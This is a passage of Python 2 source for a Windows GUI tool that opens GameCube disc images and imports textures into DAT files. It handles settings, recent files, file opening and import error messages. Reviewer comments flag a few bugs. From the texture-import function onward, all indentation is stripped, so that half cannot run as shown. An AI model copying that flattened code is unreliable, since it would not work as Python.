	# presumably this tool targets Windows — confirm before running elsewhere.
	process = subprocess.Popen( command, shell=shell, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, creationflags=0x08000000 )
	# Send any stdin data and block until the process exits, collecting all output
	stdoutData, stderrData = process.communicate( input=standardInput )
	if process.returncode == 0:
		# Success; hand back the captured stdout
		return ( process.returncode, stdoutData )
	else:
		# Failure; report to console and hand back the captured stderr instead
		print 'IPC error (exit code {}):'.format( process.returncode )
		print stderrData
		return ( process.returncode, stderrData )
def replaceHex( hexData, offset, newHex ): # Input takes a string, int, and string, respectively. todo: finish depricating this
	""" Overwrites part of a hex string with new hex data at the given byte offset.
		The data is a plain string, so offsets are doubled to count nibbles. """
	nibbleOffset = offset * 2
	endPoint = nibbleOffset + len( newHex )
	return hexData[:nibbleOffset] + newHex + hexData[endPoint:]
#=============================#
# ~ ~ Opening & Importing ~ ~ #
#=============================#
def openFolder( folderPath ):
	""" Opens the given folder in the system file explorer, or alerts the user if it can't be found. """
	absolutePath = os.path.abspath( folderPath ) # Turns relative to absolute paths, and normalizes them (switches / for \, etc.)
	if not os.path.exists( absolutePath ):
		msg( 'Could not find this folder: \n\n' + absolutePath )
	else:
		os.startfile( absolutePath )
def loadSettings():
	""" Reads the program's settings file (if present) and guarantees every expected
		section/option exists, substituting defaults for anything missing or invalid.
		Also (re)initializes the Tk BooleanVar control variables and the parsed
		image-filter tuples used elsewhere in the GUI. """
	# Check for user defined settings / persistent memory.
	if os.path.exists( settingsFile ): settings.read( settingsFile )
	# Create the individual sections if they don't already exist.
	if not settings.has_section('General Settings'): settings.add_section('General Settings')
	if not settings.has_section('Texture Search Filters'): settings.add_section('Texture Search Filters')
	# Set default settings if they were not loaded from the settings file, and validate the rest
	for settingName in generalSettingsDefaults:
		# If a default setting was not found in the settings file, set it to its default value
		if not settings.has_option( 'General Settings', settingName ):
			settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
		# If the setting is present and should be a number, validate it.
		elif settingName == 'maxFilesToRemember' or settingName == 'globalFontSize' or settingName == 'paddingBetweenFiles':
			value = settings.get( 'General Settings', settingName )
			if settingName == 'maxFilesToRemember' or settingName == 'globalFontSize':
				# These two must parse as plain numbers
				if isNaN( value ):
					msg( 'The value for the saved setting "' + settingName + '" does not appear to be a number. '
						'The default value of ' + generalSettingsDefaults[settingName] + ' will be used instead.',
						'Error Loading Settings' )
					settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
			elif settingName == 'paddingBetweenFiles' and value.lower() != 'auto':
				# Padding must be hexadecimal (or the literal string 'auto')
				try: int( value, 16 )
				except:
					msg( 'The value for the saved setting "paddingBetweenFiles" is invalid. '
						'The value should be a hexadecimal number, or "auto". The default value '
						'of ' + generalSettingsDefaults[settingName] + ' will be used instead.',
						'Error Loading Settings' )
					settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
		# Convert the filter string to its numeral representation.
		if settingName == 'downscalingFilter':
			validFilters = ( 'nearest', 'lanczos', 'bilinear', 'bicubic' )
			currentFilter = settings.get( 'General Settings', 'downscalingFilter' )
			if not currentFilter in validFilters: # Filter string unrecognized
				msg( "The given downscaling filter is invalid; valid options are 'nearest', 'lanczos', 'bilinear', or 'bicubic'. "
					'The default value of ' + generalSettingsDefaults[settingName] + ' will be used instead.', 'Error Loading Settings' )
				settings.set( 'General Settings', settingName, generalSettingsDefaults[settingName] )
	for settingName in imageFiltersDefaults:
		if not settings.has_option('Texture Search Filters', settingName):
			settings.set( 'Texture Search Filters', settingName, imageFiltersDefaults[settingName] )
		else:
			# Perform some validation on the setting's value (by making sure there is a comparator and separator)
			value = settings.get( 'Texture Search Filters', settingName )
			if '|' not in value or len( value.split('|')[0] ) > 2:
				# NOTE(review): the message below looks up generalSettingsDefaults, but this loop iterates
				# imageFiltersDefaults — if the key is missing from the former this raises KeyError. TODO confirm.
				msg( 'A problem was detected for the texture search filter setting, "' + settingName + '". The '
					'default value of ' + generalSettingsDefaults[settingName] + ' will be used instead.', 'Error Loading Settings' )
				settings.set( 'Texture Search Filters', settingName, imageFiltersDefaults[settingName] )
	global generalBoolSettings
	for settingName in generalBoolSettingsDefaults:
		if not settings.has_option( 'General Settings', settingName ):
			settings.set( 'General Settings', settingName, generalBoolSettingsDefaults[settingName] )
		if settingName not in generalBoolSettings: generalBoolSettings[ settingName ] = Tk.BooleanVar() # Should only occur on initial program start
		# These are a special set of control variables, BooleanVars(), which must be created separately/anew from the settings in the configParser settings object
		generalBoolSettings[settingName].set( settings.getboolean('General Settings', settingName) )
	# These values will have some post-processing done; so they will be initialized here so that the post-processing is done just once.
	global imageFilters
	for settingName in imageFiltersDefaults:
		# The image-type filter uses '_' between entries; all others use ','
		if settingName == 'imageTypeFilter': charToReplace = '_'
		else: charToReplace = ','
		imageFilters[settingName] = tuple( settings.get( 'Texture Search Filters', settingName ).replace( charToReplace, '' ).split( '|' ) )
def getRecentFilesLists(): # Returns two lists of tuples (ISOs & DATs), where each tuple is a ( filepath, dateTimeObject )
	""" Reads the 'Recent Files' section of the settings object and splits its entries
		into two lists: disc images / root folders (ISOs) and everything else (DATs).
		Each entry is a tuple of ( filepath, dateTimeObject ). Entries whose timestamp
		fails to parse prompt the user to optionally remove them. """
	# Collect the current [separate] lists of recent ISOs, and recent DAT (or other) files.
	ISOs = []
	DATs = []
	if settings.has_section('Recent Files'):
		recentFiles = settings.options('Recent Files')
		for filepath in recentFiles:
			try:
				# The stored value for each path is its last-opened timestamp
				newDatetimeObject = datetime.strptime( settings.get('Recent Files', filepath), "%Y-%m-%d %H:%M:%S.%f" )
				optionTuple = ( filepath, newDatetimeObject ) # Tuple of ( normalizedPath, dateTimeObject ).
				ext = os.path.splitext( filepath )[1].lower()
				# Paths were stored with ':' swapped for '|' (settings parser quirk); restore for the root-folder check
				if ext == '.iso' or ext == '.gcm' or isRootFolder( filepath.replace('|', ':'), showError=False )[0]:
					ISOs.append( optionTuple )
				else: DATs.append( optionTuple )
			except:
				# Timestamp (or other data) was unreadable; offer to drop the corrupt entry
				removeEntry = tkMessageBox.askyesno( 'Error Parsing Settings File', 'The timestamp for one of the recently opened files, "' + filepath.replace('|', ':') + '", could not be read. '
					'The settings file, or just this entry within it, seems to be corrupted.'
					'\n\nDo you want to remove this item from the list of recently opened files?' )
				if removeEntry: settings.remove_option( 'Recent Files', filepath )
	return ISOs, DATs
def promptToOpenFile( typeToOpen ):
	""" This is primarily a wrapper for the 'Open Disc' and 'Open DAT' options in the main menu. """
	if typeToOpen == 'iso':
		dialogOptions = {
			'title': "Choose an ISO or GCM file to open.",
			'filetypes': [('Disc image files', '*.iso *.gcm'), ('All files', '*.*')]
		}
	else:
		dialogOptions = {
			'title': "Choose a texture data file to open.",
			'filetypes': [('Texture data files', '*.dat *.usd *.lat *.rat'), ('All files', '*.*')]
		}
	filepath = tkFileDialog.askopenfilename(
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		**dialogOptions
	)
	fileHandler( [filepath] ) # Will handle validation of the filepath.
def openDatDestination( event ):
	""" This is only called by pressing Enter/Return on the top file path display/entry of
		the DAT Texture Tree tab. Verifies the given path and loads the file for viewing. """
	filepath = Gui.datDestination.get().replace( '"', '' )
	if not pathIsFromDisc( Gui.datDestination ):
		fileHandler( [filepath] )
	else:
		# The path points inside the currently loaded disc; its lowercased form is the tree iid
		loadFileWithinDisc( filepath.lower() )
def openIsoDestination( event ):
	""" This is only called by pressing Enter/Return on the top file path display/entry of
		the Disc Details tab. Verifies the given path and loads the file for viewing. """
	filepath = Gui.isoDestination.get().replace( '"', '' )
	if not pathIsFromDisc( Gui.isoDestination ):
		fileHandler( [filepath] )
	else:
		# The path points inside the currently loaded disc; its lowercased form is the tree iid
		loadFileWithinDisc( filepath.lower() )
def rememberFile( filepath, updateDefaultDirectory=True ):
	""" Checks for the settings file and creates it as well as the 'Recent Files' section if they don't exist.
		Then saves the given filepath so it can be recalled later from the 'Open Recent' menu.
		Older entries of the same category (ISO vs DAT) are evicted to honor the
		'maxFilesToRemember' setting, and the settings file is rewritten to disk. """
	extension = os.path.splitext( filepath )[1].lower()
	filepath = os.path.normpath( filepath ) # Normalizes it to prevent duplicate entries
	timeStamp = str( datetime.today() )
	# If the settings file exists, and has more than max entries for the current file type, remove the extras
	if settings.has_section('Recent Files'):
		# Collect the current [separate] lists of recent ISOs, and recent DAT (or other) files.
		maxFiles = int( settings.get('General Settings', 'maxFilesToRemember') )
		ISOs, DATs = getRecentFilesLists()
		# For the current filetype, sort the list so that the oldest file is first
		if extension == '.iso' or extension == '.gcm' or isRootFolder( filepath )[0]: targetList = ISOs
		else: targetList = DATs
		targetList.sort( key=lambda recentInfo: recentInfo[1] ) # Sorts by the datetime object (oldest first)
		# Remove the oldest file(s) from the settings file until the specified max number of files to remember is reached.
		while len( targetList ) > maxFiles - 1: # -1 leaves room for the entry added below
			settings.remove_option( 'Recent Files', targetList[0][0] )
			targetList.pop( 0 )
	# Update the default search directory.
	if updateDefaultDirectory:
		dirPath = os.path.dirname( filepath )
		settings.set( 'General Settings', 'defaultSearchDirectory', dirPath )
	if not settings.has_section('Recent Files'): settings.add_section('Recent Files')
	settings.set( 'Recent Files', filepath.replace(':', '|'), timeStamp ) # Colon is replaced because it confuses the settings parser.
	# Save the current program settings to the file
	with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def fileHandler( filepaths, dropTarget='', updateDefaultDirectory=True, updateDetailsTab=True ):
	""" All opened standalone ISO & DAT files should pass through this (regardless of whether it was from drag-and-drop,
		file menu, or other methods), with the exception of files viewed with the 'prev/next DAT' buttons.

		filepaths: list of file/folder path strings to open.
		dropTarget: identifies the GUI widget the files were dropped onto (if any),
			which can change how a DAT is processed (e.g. 'cccTab...' prefixed targets).
		updateDefaultDirectory / updateDetailsTab: forwarded to rememberFile / scan functions. """
	if filepaths == [] or filepaths == ['']: return
	elif len( filepaths ) == 1:
		extension = os.path.splitext( filepaths[0] )[1].lower()
		mostOccuringTypes = [extension]
	else:
		# Figure out the most common type of file among the filepaths (which should be a list) to determine how the group should be processed.
		typeCounts = {}
		for filepath in filepaths:
			ext = os.path.splitext( filepath )[1].lower()
			if ext in typeCounts: typeCounts[ext] += 1
			else: typeCounts[ext] = 1
		maxUniqueOccurances = max( typeCounts.values() )
		mostOccuringTypes = [ x for x, y in typeCounts.items() if y == maxUniqueOccurances ]
		# NOTE(review): 'extension' is never assigned in this branch, but it is read below whenever
		# multiple paths were given and exactly one survives verification — that would raise a
		# NameError. TODO: confirm and derive extension from verifiedPaths[0] instead.
	# Normalize the paths (prevents discrepancies between paths with forward vs. back slashes, etc.) and remove files that cannot be found.
	filepaths = [ os.path.normpath( filepath ) for filepath in filepaths ]
	verifiedPaths = []
	unverifiedPaths = []
	for filepath in filepaths:
		if os.path.exists( filepath ): verifiedPaths.append( filepath )
		else: unverifiedPaths.append( filepath )
	# Alert the user of any files that could not be found.
	if unverifiedPaths:
		if len(unverifiedPaths) == 1:
			msg( 'Unable to find "' + unverifiedPaths[0] + '".', 'Error: Unverifiable Path' )
		else: msg( 'Unable to find these files:\n\n' + '\n'.join( unverifiedPaths ), 'Error: Unverifiable Paths' )
	if verifiedPaths == []: return
	global globalDatFile, globalBannerFile
	currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
	# If there's only one file and it's a disc image (ISO or GCM), process it without regard for which tab is currently active.
	if len( verifiedPaths ) == 1 and ( extension == '.iso' or extension == '.gcm' ):
		# Check whether there are changes that the user wants to save
		if globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ): return
		elif not noDiscChangesToBeSaved(): return
		# Clear old DAT data if it's from a previously loaded disc
		elif globalDatFile and globalDatFile.source == 'disc':
			if not globalDatFile.noChangesToBeSaved( programClosing ): return
			else: # No changes that the user wants to save; OK to clear the DAT file.
				restoreEditedEntries( editedDatEntries )
				clearDatTab( True )
				clearStructuralAnalysisTab( True )
				globalDatFile = None
				Gui.datDestination.set('')
		# Clear old banner file
		globalBannerFile = None
		restoreEditedEntries( editedBannerEntries )
		rememberFile( verifiedPaths[0], updateDefaultDirectory )
		globalDiscDetails['isoFilePath'] = verifiedPaths[0]
		scanDisc( updateDetailsTab=updateDetailsTab )
	elif '.iso' in mostOccuringTypes or '.gcm' in mostOccuringTypes:
		msg('Please only provide one disc image (ISO or GCM file) at a time.')
	# If there's only one path and it's not an image/texture file
	elif len( verifiedPaths ) == 1 and extension != '.png' and extension != '.tpl':
		thisFile = verifiedPaths[0]
		# Check if it's a disc root directory.
		if os.path.isdir( thisFile ):
			if isRootFolder( thisFile, showError=False )[0]:
				rememberFile( thisFile, updateDefaultDirectory )
				globalDiscDetails['isoFilePath'] = thisFile
				scanRoot( updateDetailsTab=updateDetailsTab )
			else:
				msg( 'Only extracted root directories are able to opened in this way.' )
				return
		elif extension == '.bnr' : # A banner was given. Switch to the Disc Details tab and load it.
			if not globalBannerFile or (globalBannerFile and globalBannerFile.noChangesToBeSaved( programClosing ) ): # i.e. no file has been loaded, or it's OK to overwrite
				restoreEditedEntries( editedBannerEntries )
				rememberFile( thisFile, updateDefaultDirectory )
				loadStandaloneFile( thisFile )
		# Assume it's some form of DAT
		elif not globalDatFile or (globalDatFile and globalDatFile.noChangesToBeSaved( programClosing ) ): # i.e. no file has been loaded, or it's OK to overwrite
			# Perform some rudimentary validation; if it passes, remember it and load it
			if os.path.getsize( thisFile ) > 20971520: # i.e. 20 MB
				msg("The recieved file doesn't appear to be a DAT or other type of texture file, as it's larger than 20 MB. "
					"If this is actually supposed to be a disc image, rename the file with an extension of '.ISO' or '.GCM'.")
			else:
				restoreEditedEntries( editedDatEntries )
				rememberFile( thisFile, updateDefaultDirectory )
				#if dropTarget == '': # Called from a menu, or drag-n-dropped onto the program icon; not dropped onto the GUI.
				if currentTab == Gui.savTab:
					loadStandaloneFile( thisFile, toAnalyze=True, changeTab=False )
				# elif currentTab == Gui.cccTab and dropTarget == '': # Case where the 'Open Converted File' button on the CCC tab is used.
				# 	loadStandaloneFile( thisFile, tabToChangeTo=Gui.datTab )
				elif dropTarget.startswith('cccTab'):
					# Get the DAT data and relocation table from the target file.
					with open( thisFile, 'rb') as binaryFile:
						datHex = binaryFile.read().encode( 'hex' )
					prepareColorConversion( thisFile, datHex, dropTarget[6:].lower() )
				else:
					loadStandaloneFile( thisFile )
	# Process images.
	elif len( verifiedPaths ) == 1 and ( extension == '.png' or extension == '.tpl' ): processTextureImports( verifiedPaths, currentTab )
	elif '.png' in mostOccuringTypes or '.tpl' in mostOccuringTypes: processTextureImports( verifiedPaths, currentTab )
	else:
		msg('Please only provide one data file (DAT, USD, etc.) or root folder at a time. \n\nFor textures, only PNG and TPL file formats are supported.')
def importImageFiles( event=None ):
	""" Prompts the user to select texture image files (PNG or TPL) and imports them.
		Import behavior (single vs multiple selection, and the dialog title) depends
		on which main GUI tab is currently active; unsupported tabs just warn and return. """
	currentlySelectedTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )
	if currentlySelectedTab == Gui.discTab or currentlySelectedTab == Gui.mtrTab:
		# These tabs accept batch imports (filenames dictate destinations)
		title = "Choose one or more texture files to import (PNG or TPL)."
		selectMultiple = True
	elif currentlySelectedTab == Gui.discDetailsTab:
		# Preliminary check that there's a banner file loaded.
		if not globalBannerFile:
			msg( 'No banner file or disc appears to be loaded.', 'Cannot Import Banner Image' )
			return
		title = "Choose a 96x32 banner image to import (PNG or TPL)."
		selectMultiple = False
	elif currentlySelectedTab == Gui.datTab:
		# This tab replaces the currently selected texture(s), so a selection is required
		if Gui.datTextureTree.selection() == '':
			msg( 'You must select one or more textures to replace when importing textures with this tab.' + \
				"\n\nIf you'd like to use the filename to automatically dictate where this texture will go, change to the 'Disc File Tree' tab " + \
				'and try this operation again.', 'No Texture Selected. Cannot import texture.' )
			return
		title = "Choose a texture file to import (PNG or TPL)."
		selectMultiple = False
	else:
		msg( 'You may only import textures while using the Disc File Tree tab, DAT Texture Tree tab, '
			'or the Manual Replacement tab.' )
		return
	# Prompt to select the file to import.
	textureFilepaths = tkFileDialog.askopenfilename( # Will return a unicode string (if one file selected), or a tuple
		title=title,
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		filetypes=[ ('PNG files', '*.png'), ('TPL files', '*.tpl'), ('All files', '*.*') ],
		multiple=selectMultiple
	)
	if textureFilepaths:
		# Normalize the input into list form
		if not isinstance( textureFilepaths, list ) and not isinstance( textureFilepaths, tuple ):
			textureFilepaths = [textureFilepaths]
		# Update the default directory to start in when opening or exporting files.
		settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(textureFilepaths[0]) )
		with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
		processTextureImports( textureFilepaths, currentlySelectedTab )
def processTextureImports( textureFilepaths, currentlySelectedTab, warnAboutPaletteRegen=True ):
global unsavedDiscChanges
unconventionalNames = []
filesNotFoundInDisc = []
formatUnsupported = []
imageHeaderNotFound = []
imageTypeNotFound = []
invalidDimensions = []
invalidMipmapDims = []
invalidImageProperties = []
invalidPaletteProperties = []
notEnoughSpace = []
paletteRegenerated = []
paletteTooLarge = []
paletteNotFound = []
unknownErrors = []
successfulImports = 0
failedImports = 0
# Determine import behavior by checking what tab is selected.
if currentlySelectedTab == Gui.discTab:
if globalDiscDetails['isoFilePath'] == '':
msg( 'No disc image has been loaded.' )
return
else:
datIidToReload = ''
workingFile = 1
gameId = globalDiscDetails['gameId'].lower()
for textureFilepath in textureFilepaths:
# Update the GUI status feedback.
updateProgramStatus( 'Processing File ' + str(workingFile) + '....' )
Gui.programStatusLabel.update()
workingFile += 1
# Validate the filename; confirm that it's of the standard naming convention and parse it for info.
imageType, imageDataOffset, sourceFile = codecBase.parseFilename( os.path.basename( textureFilepath ) )
iid = ( gameId + '/' + sourceFile.replace( '-', '/' ) ).lower()
if imageType == -1 or imageDataOffset == -1 or sourceFile == '':
unconventionalNames.append( textureFilepath )
failedImports += 1
elif not Gui.isoFileTree.exists( iid ):
filesNotFoundInDisc.append( (textureFilepath, sourceFile.replace( '-', '/' )) )
failedImports += 1
else:
# Get info on the target file and load it
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
try:
thisDat = hsdFiles.datFileObj( source='disc' )
thisDat.load( iid, fileData=getFileDataFromDiscTreeAsBytes( iid=iid ), fileName=os.path.basename( isoPath ) )
except:
unknownErrors.append( (textureFilepath, 'fileLoadError') )
continue
# Write the image data into the target file
status, return2, return3 = writeTextureToDat( thisDat, textureFilepath, imageDataOffset - 0x20, False )
if status == 'dataObtained' or status == 'dataWithAdHocPalette' or status == 'paletteRegenerated': # or status == 'invalidDimensions'
# The write operation was a success. Save the new file data
newFileData = hexlify( thisDat.getFullData() )
Gui.isoFileTree.item( iid, values=('Includes updated textures', entity, isoOffset, fileSize, isoPath, 'ram', newFileData), tags='changed' )
# Check if the dat currently loaded in the DAT Texture Tree tab has been updated with a new texture, and queue it for reloading if it has
if not datIidToReload and globalDatFile and globalDatFile.source == 'disc' and globalDatFile.path.lower() == iid:
datIidToReload = iid
# Remember notices to the user, to present once the import loop is finished.
if status == 'paletteRegenerated' or status == 'dataWithAdHocPalette':
paletteRegenerated.append( textureFilepath ) # Successful, but had to create a new palette / image colors
successfulImports += 1
else:
# Remember errors to the user, to present once the import loop is finished.
imageDataOffset = uHex( imageDataOffset ) # This already includes 0x20 header offset
if status == 'formatUnsupported': formatUnsupported.append( textureFilepath )
elif status == 'imageHeaderNotFound': imageHeaderNotFound.append( (textureFilepath, imageDataOffset) )
elif status == 'imageTypeNotFound': imageTypeNotFound.append( textureFilepath )
elif status == 'invalidDimensions': invalidDimensions.append( (textureFilepath, False) )
elif status == 'invalidMipmapDims': invalidMipmapDims.append( textureFilepath )
elif status == 'invalidImageProperties': invalidImageProperties.append( (textureFilepath, imageDataOffset, return2, return3) )
elif status == 'invalidPaletteProperties': invalidPaletteProperties.append( (textureFilepath, imageDataOffset, return2, return3) )
elif status == 'notEnoughSpace': notEnoughSpace.append( (textureFilepath, imageDataOffset) )
elif status == 'paletteTooLarge': paletteTooLarge.append( (textureFilepath, imageDataOffset, return2, return3) )
elif status == 'paletteNotFound': paletteNotFound.append( textureFilepath )
else: unknownErrors.append( (textureFilepath, status) )
failedImports += 1
# Finished iterating over the imported texture filepaths.
# Record that textures were updated for the current disc
if successfulImports > 0:
if successfulImports == 1: unsavedDiscChanges.append( '1 texture imported via Disc Import Method.' )
else: unsavedDiscChanges.append( str(successfulImports) + ' textures imported via Disc Import Method.' )
# Reload the DAT currently loaded in the DAT Texture Tree tab if it has had any of it's textures changed by this import method.
if datIidToReload and Gui.datTextureTree.get_children():
if globalDatFile.unsavedChanges:
warning = ( '"' + globalDatFile.path.split('/')[-1] + '" has been updated in the disc, however, the copy of it in the DAT Texture Tree '
'tab still has unsaved changes. Do you want to discard these changes and load the new file?' )
if tkMessageBox.askyesno( 'Unsaved Changes', warning ):
globalDatFile.unsavedChanges = []
loadFileWithinDisc( datIidToReload, changeTab=False )
else:
loadFileWithinDisc( datIidToReload, changeTab=False )
elif currentlySelectedTab == Gui.discDetailsTab: # For banners
if len( textureFilepaths ) > 1:
msg( "You may only import one banner at a time.", 'Too Many Files Imported' )
else:
textureFilepath = textureFilepaths[0]
if not globalBannerFile or not globalBannerFile.data:
msg( 'No banner file or disc appears to be loaded.', 'Cannot Import Banner Image' )
else:
status, return2, return3 = writeTextureToDat( globalBannerFile, textureFilepath, 0x20, False )
if status == 'dataObtained' or status == 'dataWithAdHocPalette' or status == 'paletteRegenerated':
if globalBannerFile.source == 'disc':
bannerIid = globalBannerFile.path
newBannerData = hexlify( globalBannerFile.data )
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( bannerIid, 'values' )
Gui.isoFileTree.item( bannerIid, values=('Banner replaced', entity, isoOffset, fileSize, isoPath, 'ram', newBannerData), tags='changed' )
unsavedDiscChanges.append( 'Game banner image updated' )
else: # source = 'file'; i.e. it's a standalone file not from a disc
globalBannerFile.unsavedChanges.append( 'Game banner image updated' )
# Remember notices to the user, to present once the import loop is finished.
if status == 'paletteRegenerated' or status == 'dataWithAdHocPalette':
paletteRegenerated.append( textureFilepath ) # Successful, but had to create a new palette / image colors
successfulImports += 1
# Update the GUI wth the new image
updateBannerFileInfo( updateTextEntries=False ) # First arg: don't want to clear any other user data that might have been modified.
else:
# Remember errors to the user, to present once the import loop is finished.
if status == 'formatUnsupported': formatUnsupported.append( textureFilepath )
elif status == 'imageHeaderNotFound': imageHeaderNotFound.append( (textureFilepath, '0x20') )
elif status == 'imageTypeNotFound': imageTypeNotFound.append( textureFilepath )
elif status == 'invalidDimensions': invalidDimensions.append( (textureFilepath, True) )
elif status == 'notEnoughSpace': notEnoughSpace.append( (textureFilepath, '0x20') )
elif status == 'paletteTooLarge': paletteTooLarge.append( (textureFilepath, '0x20', return2, return3) )
elif status == 'paletteNotFound': paletteNotFound.append( textureFilepath )
else: unknownErrors.append( (textureFilepath, status) )
failedImports += 1
elif currentlySelectedTab == Gui.datTab: # DAT Texture Tree direct imports
iidSelectionsTuple = Gui.datTextureTree.selection()
# Compose an error message if the inputs are invalid.
inputErrorMsg = ''
if not iidSelectionsTuple:
# This check is repeated from importImageFiles() because there are other ways files may be given to this function.
inputErrorMsg = 'You must select one or more textures to replace when importing textures on this tab.'
title = 'No Textures Selected'
elif len( textureFilepaths ) > 1: # isinstance( textureFilepaths, list) and
inputErrorMsg = "You may only import one texture at a time using this tab."
title = 'Too Many Files Imported'
if inputErrorMsg:
inputErrorMsg += "\n\nIf you'd like to import multiple textures to a standalone file (one not in a disc), then you can use the 'Manual Placement' tab. " + \
"Or, if you'd like to import one or more textures straight into a disc (using the filename to automatically dictate where each will go), " + \
"select the 'Disc File Tree' tab and try this operation again."
msg( inputErrorMsg, title )
else:
textureFilepath = textureFilepaths[0]
# Update the textures in the treeview (preview/full images, info, and data in the globalDatFile object)
for iid in iidSelectionsTuple: # Import the given texture (should only be one being imported in this case) to replace all selected textures. (int(iid)=imageDataOffset)
imageDataOffset = int( iid )
status, return2, return3 = writeTextureToDat( globalDatFile, textureFilepath, imageDataOffset, True )
print 'texture-write operation status:', status
if status == 'dataObtained' or status == 'dataWithAdHocPalette' or status == 'paletteRegenerated': # Success
# Remember notices to the user, to present once the import loop is finished.
if status == 'paletteRegenerated' or status == 'dataWithAdHocPalette':
paletteRegenerated.append( textureFilepath ) # Successful, but had to create a new palette / image colors
successfulImports += 1
# Refresh the GUI (the texture display and all datTab tabs) if this is the currently displayed texture (last item in selection).
if iid == iidSelectionsTuple[-1]: onTextureTreeSelect( '', iid=iidSelectionsTuple )
else:
# Remember errors to the user, to present once the import loop is finished.
compensatedImageDataOffset = uHex( 0x20 + imageDataOffset )
if status == 'formatUnsupported': formatUnsupported.append( textureFilepath )
elif status == 'imageHeaderNotFound': imageHeaderNotFound.append( (textureFilepath, compensatedImageDataOffset) )
elif status == 'imageTypeNotFound': imageTypeNotFound.append( textureFilepath )
elif status == 'invalidDimensions': invalidDimensions.append( (textureFilepath, False) )
elif status == 'invalidMipmapDims': invalidMipmapDims.append( textureFilepath )
elif status == 'invalidImageProperties': invalidImageProperties.append( (textureFilepath, compensatedImageDataOffset, return2, return3) )
elif status == 'invalidPaletteProperties': invalidPaletteProperties.append( (textureFilepath, compensatedImageDataOffset, return2, return3) )
elif status == 'notEnoughSpace': notEnoughSpace.append( (textureFilepath, compensatedImageDataOffset) )
elif status == 'paletteTooLarge': paletteTooLarge.append( (textureFilepath, compensatedImageDataOffset, return2, return3) )
elif status == 'paletteNotFound': paletteNotFound.append( textureFilepath )
else: unknownErrors.append( (textureFilepath, status) )
failedImports += 1
elif currentlySelectedTab == Gui.mtrTab: showSelectedPaths( textureFilepaths )
elif currentlySelectedTab == Gui.cccTab: msg( 'Only character texture files are accepted here\n(e.g. .DAT, .USD, .LAT, etc.)' )
# Prepare an error message for any errors observed.
correctDimensions = 'The dimensions for a game banner should be 96 x 32. The width and height for standard textures should each not exceed 1024, and should be a multiple of 2. '
if failedImports > 0:
compoundImportErrorsMessage = ''
if len( textureFilepaths ) == 1: updateProgramStatus( 'Import Failed' )
else:
if successfulImports == 0:
updateProgramStatus( 'Imports Failed' )
compoundImportErrorsMessage = 'No textures could be imported. '
else: # Some were successful, while some failed. Get counts of each
updateProgramStatus( 'Some Imports Failed' )
if successfulImports == 1: compoundImportErrorsMessage = '1 texture was successfully imported. '
else: compoundImportErrorsMessage = str(successfulImports) + ' textures were successfully imported. '
if failedImports == 1: compoundImportErrorsMessage += 'However, 1 import failed.'
else: compoundImportErrorsMessage += 'However, ' + str(failedImports) + ' imports failed.'
if unconventionalNames:
if len( unconventionalNames ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( unconventionalNames[0] ) + '" could not be processed by '
"this import method because it doesn't appear to be using the standard naming convention. Ignoring extension, the standard naming convention is "
""""[sourceFile]_[textureOffset]_[textureType]". For example, "MnMaAll.usd_0x70580_0" or even "[your notes]_MnMaAll.usd_0x70580_0". As an alternative to renaming it, """
"you can import it using the DAT File Tree tab, which doesn't care about the image file's name." )
else: compoundImportErrorsMessage += ( "\n\nThe files below could not be processed by this import method because they don't "
"""appear to be using the standard naming convention. Ignoring extension, the standard naming convention is "[sourceFile]_[textureOffset]_[textureType]". """
"""For example, "MnMaAll.usd_0x70580_0" or even "[your notes]_MnMaAll.usd_0x70580_0". As an alternative to renaming them, """
"you can individually import them using the DAT File Tree tab, which doesn't care about the image files' names.\n\n" + '\n'.join(unconventionalNames) )
if filesNotFoundInDisc:
if len( filesNotFoundInDisc ) == 1: compoundImportErrorsMessage += '\n\n"' + os.path.basename( filesNotFoundInDisc[0][0] ) + \
' could not be imported because the game file "' + filesNotFoundInDisc[0][1] + '" was not found in the disc.'
else: compoundImportErrorsMessage += "\n\nSome textures couldn't be imported because the following game files were not found in the disc:\n\n" + \
'\n'.join( [failedImport[1] for failedImport in filesNotFoundInDisc] )
if formatUnsupported:
if len( formatUnsupported ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( formatUnsupported[0] ) + """" couldn't be imported because something """ + \
"indicates that it's not actually a TPL or PNG file (you might want to double-check the file extension, or try getting a new copy of the texture)." )
else: compoundImportErrorsMessage += ( """\n\nThe following files couldn't be imported because something indicates that they're not in TPL or PNG format """ + \
"(you might want to double-check the file extensions, or try getting a new copy of the textures):\n\n" + '\n'.join(formatUnsupported) )
if imageHeaderNotFound:
if len( imageHeaderNotFound ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( imageHeaderNotFound[0][0] ) + '" could not be imported because the offset '
'appears to be incorrect. No image data headers could be found for the data at its assigned destination (at ' + imageHeaderNotFound[0][1] + ")." )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because their offsets appear to be incorrect (no image data headers '
"could be found for them at their assigned destination):\n\n" + '\n'.join([failedImport[0] for failedImport in imageHeaderNotFound]) )
if imageTypeNotFound: # Is this case possible (should be irrelevant or caught by unconventionalNames)?
if len( imageTypeNotFound ) == 1: compoundImportErrorsMessage += ( '\n\nA texture type or palette type could not be determined for "' + os.path.basename( imageTypeNotFound[0] ) + '".' )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because a texture type or palette type could not be determined:\n\n' + '\n'.join(imageTypeNotFound) )
if invalidDimensions:
if invalidDimensions[0][1]: correctDimensions = 'The dimensions for a game banner should be 96x32 pixels. ' # Checks bool packaged with texture path to see if it's a banner (import on disc details tab)
else: correctDimensions = 'The width and height for standard textures should not exceed 1024, and should be a multiple of 2. '
